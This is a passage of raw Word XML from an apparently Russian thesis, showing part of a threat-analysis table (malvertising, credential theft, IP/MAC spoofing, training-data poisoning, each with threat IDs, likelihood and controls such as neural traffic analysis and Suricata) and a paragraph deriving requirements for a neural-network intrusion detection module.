              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6433139A" w14:textId="0BB2EE6C" w:rsidR="00357C00" w:rsidRPr="00913F86" w:rsidRDefault="00357C00"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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1683EB91" w14:textId="6A7159C2" w:rsidR="00357C00" w:rsidRPr="00913F86" w:rsidRDefault="00357C00"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5DF0CD60" w14:textId="198D4DFB" w:rsidR="00357C00" w:rsidRPr="00913F86" w:rsidRDefault="00357C00"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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="851" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7A03C273" w14:textId="5CF55C3D" w:rsidR="00357C00" w:rsidRPr="00913F86" w:rsidRDefault="00357C00"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1894" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7D47A92A" w14:textId="4BE089FE" w:rsidR="00357C00" w:rsidRDefault="00357C00"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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E0171" w:rsidRPr="00913F86" w14:paraId="2458A392" w14:textId="77777777" w:rsidTr="00B93B26">
        <w:trPr>
          <w:trHeight w:val="2169"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1413" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="53AC8BE6"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D7FD411" w14:textId="184B1D46"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w:t>
            </w:r>
            <w:r w:rsidR="00B93B26" w:rsidRPr="00913F86">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Компрометация рабочих станций</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4BF75E07" w14:textId="0F02D1CC"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xml:space="preserve">УБИ.186 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6BDF01D1"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75%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65558F82"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Загрузка вредоносного контента через легитимные сайты (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00913F86">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>malvertising</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00913F86">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00913F86">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>drive-by</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00913F86">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00913F86">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>download</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00913F86">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="851" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E6F4D50"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Высокая</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1894" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2EF5BCCC" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00913F86" w:rsidRDefault="008E0171"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Анализ исходящего трафика при помощи нейросетевого модуля.</w:t>
            </w:r>
            <w:r w:rsidRPr="00913F86">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B93B26" w:rsidRPr="00913F86" w14:paraId="6B389625" w14:textId="77777777" w:rsidTr="00B93B26">
        <w:trPr>
          <w:trHeight w:val="2114"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1413" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02818EF6" w14:textId="7777777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Безопасность учетных записей и аутентификации</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7787DA1F" w14:textId="3F561E74" w:rsidR="00B93B26" w:rsidRPr="00913F86" w:rsidRDefault="00B93B26"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31C7DF68" w14:textId="7777777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Кража учетных данных и несанкционированный доступ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5BD27444" w14:textId="7A3733C8"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xml:space="preserve">УБИ.175 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="33C34C97" w14:textId="7777777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75%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="665E084E" w14:textId="7777777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Социальная инженерия, обходящая технические средства защиты.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="851" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4071952B" w14:textId="7777777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Высокая</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1894" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60745D9F" w14:textId="77777777" w:rsidR="00B93B26" w:rsidRPr="00913F86" w:rsidRDefault="00B93B26" w:rsidP="00AB6434">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Анализ исходящего трафика при помощи нейросетевого модуля.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B93B26" w:rsidRPr="00913F86" w14:paraId="4462707F" w14:textId="77777777" w:rsidTr="00B93B26">
        <w:trPr>
          <w:trHeight w:val="1548"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1413" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0CD04AE2" w14:textId="42EC68E9" w:rsidR="00B93B26" w:rsidRPr="00913F86" w:rsidRDefault="00B93B26" w:rsidP="000E29DB">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2DD57A9F" w14:textId="685EB360" w:rsidR="00B93B26" w:rsidRPr="00913F86" w:rsidRDefault="00B93B26"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Несанкционированный доступ к сети</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="71CDFA47" w14:textId="32CA7419" w:rsidR="00B93B26" w:rsidRPr="00913F86" w:rsidRDefault="00B93B26"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xml:space="preserve">УБИ.131 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="060771CE" w14:textId="696AEA28" w:rsidR="00B93B26" w:rsidRPr="00913F86" w:rsidRDefault="00B93B26"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75%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="66A590A0" w14:textId="45A5FB44" w:rsidR="00B93B26" w:rsidRPr="00913F86" w:rsidRDefault="00B93B26"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Возможность подделки IP/MAC адресов для обхода ACL и простых правил.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="851" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="78AA2B14" w14:textId="0BA5276A" w:rsidR="00B93B26" w:rsidRPr="00913F86" w:rsidRDefault="00B93B26"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Высокая</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1894" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3343A01E" w14:textId="59E5BA77" w:rsidR="00B93B26" w:rsidRDefault="00B93B26"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Поведенческий анализ сетевых потоков</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> нейронной сетью+</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Suricata</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E29DB" w:rsidRPr="00913F86" w14:paraId="78CA361D" w14:textId="77777777" w:rsidTr="00B93B26">
        <w:trPr>
          <w:trHeight w:val="1684"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1413" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6AA54D65" w14:textId="5D2F4078" w:rsidR="000E29DB" w:rsidRPr="00913F86" w:rsidRDefault="000E29DB"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Целостность и эффективность системы ИИ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="62970E8E" w14:textId="78C9223E" w:rsidR="000E29DB" w:rsidRPr="00913F86" w:rsidRDefault="000E29DB"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Компрометация модели обнаружения</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="581648E2" w14:textId="1BD4A10D" w:rsidR="000E29DB" w:rsidRPr="00913F86" w:rsidRDefault="000E29DB"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xml:space="preserve">УБИ.221 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="69F6E422" w14:textId="72630F67" w:rsidR="000E29DB" w:rsidRPr="00913F86" w:rsidRDefault="000E29DB"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75%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3F9AEAFB" w14:textId="74F62112" w:rsidR="000E29DB" w:rsidRPr="00913F86" w:rsidRDefault="000E29DB"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 xml:space="preserve">Возможность "отравления" обучающих данных </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="851" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="353577F9" w14:textId="4D34BD4F" w:rsidR="000E29DB" w:rsidRPr="00913F86" w:rsidRDefault="000E29DB" w:rsidP="000E29DB">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00913F86">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Средняя</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1894" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5F486EA9" w14:textId="7B4F51F8" w:rsidR="000E29DB" w:rsidRDefault="000E29DB" w:rsidP="000E29DB">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Разграничение прав доступа к модулю защиты</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="47D705CC" w14:textId="77777777" w:rsidR="00807E0C" w:rsidRDefault="00807E0C" w:rsidP="008E0171">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A21448F" w14:textId="77777777" w:rsidR="003770F2" w:rsidRPr="00883ECE" w:rsidRDefault="003770F2" w:rsidP="008E0171">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B639779" w14:textId="6776CBE8" w:rsidR="000C2219" w:rsidRDefault="00C022BB" w:rsidP="00AF539D">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="171717" w:themeColor="background2" w:themeShade="1A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C022BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="171717" w:themeColor="background2" w:themeShade="1A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Таким образом, проведённый анализ угроз и уязвимостей позволяет сформулировать требования к разрабатываемому нейросетевому модулю. Система должна обеспечивать обнаружение актуальных угроз, определённых в таблице 6, в первую очередь атак типа </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C022BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="171717" w:themeColor="background2" w:themeShade="1A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>DDoS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C022BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="171717" w:themeColor="background2" w:themeShade="1A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, ботнет-активности и несанкционированного доступа к веб-ресурсам. При этом для каждой из угроз определён конкретный механизм контроля, реализация которого будет описана в следующих разделах работы. Совокупность выявленных угроз также определяет требования к набору данных для обучения нейросетевой модели — он должен содержать представительные примеры каждого из актуальных классов атак. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A91430" w14:textId="77777777" w:rsidR="00357C00" w:rsidRPr="000A6378" w:rsidRDefault="00357C00" w:rsidP="00AF539D">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="171717" w:themeColor="background2" w:themeShade="1A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B3A9226" w14:textId="61BC5745" w:rsidR="008E0171" w:rsidRDefault="00812517" w:rsidP="00230C61">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc231673281"/>
      <w:r>
        <w:lastRenderedPageBreak/>
